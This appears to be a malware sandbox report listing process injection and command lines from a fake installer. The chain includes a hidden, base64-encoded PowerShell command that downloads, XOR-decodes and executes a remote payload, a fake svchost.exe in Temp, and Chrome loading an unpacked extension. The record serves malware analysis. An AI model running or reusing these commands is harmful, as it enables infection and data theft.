PID 1420 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Windows\SysWOW64\msiexec.exe
PID 1420 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Windows\SysWOW64\msiexec.exe
PID 1420 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Windows\SysWOW64\msiexec.exe
PID 2496 wrote to memory of 4696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2496 wrote to memory of 4696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2496 wrote to memory of 4696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4696 wrote to memory of 2556 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4696 wrote to memory of 2556 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4696 wrote to memory of 2556 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 960 wrote to memory of 3056 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 3056 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 2292 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 3052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 3052 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 4900 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 4900 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 4900 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 4900 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 4900 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 4900 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 4900 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 4900 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 4900 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 960 wrote to memory of 4900 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding B679B08DEE859E7BF68230C84A800740 C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu 6.2.8\install\BCC1C09\installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707258448 " AI_EUIMSI=""

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 74F892A0B540A5F6AEE19F1BF7837B4F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssAF9C.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiAF99.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrAF9A.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrAF9B.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd1f0b9758,0x7ffd1f0b9768,0x7ffd1f0b9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1356 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2184 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3180 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3160 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4520 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=1820,i,2550519775203384833,13483502084574906312,131072 /prefetch:8

C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe

"C:\Users\Admin\AppData\Roaming\vdu exp\AppVdu\gnupg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAGcAbwBvAGQAMgAtAGwAZQBkAC4AYwBvAG0ALwBkAGEAcgBrADQALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBkACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAZwAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAG0AIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgBzACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\aPee1yKEMUOBcG5\svchost.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3940 -ip 3940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 2396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3940 -ip 3940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 2392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3940 -ip 3940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 2388

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Local\Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd0c8b9758,0x7ffd0c8b9768,0x7ffd0c8b9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3208 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3176 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1868 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4624 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4860 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5576 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5744 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5688 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3316 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3396 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4852 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3616 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3696 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4888 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5876 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=2432 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=1548 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=3300 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4652 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=2928 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5232 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=4908 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4664 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6072 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=3268 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6500 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=6656 --field-trial-handle=1888,i,7728734869268446550,5640101350435155183,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

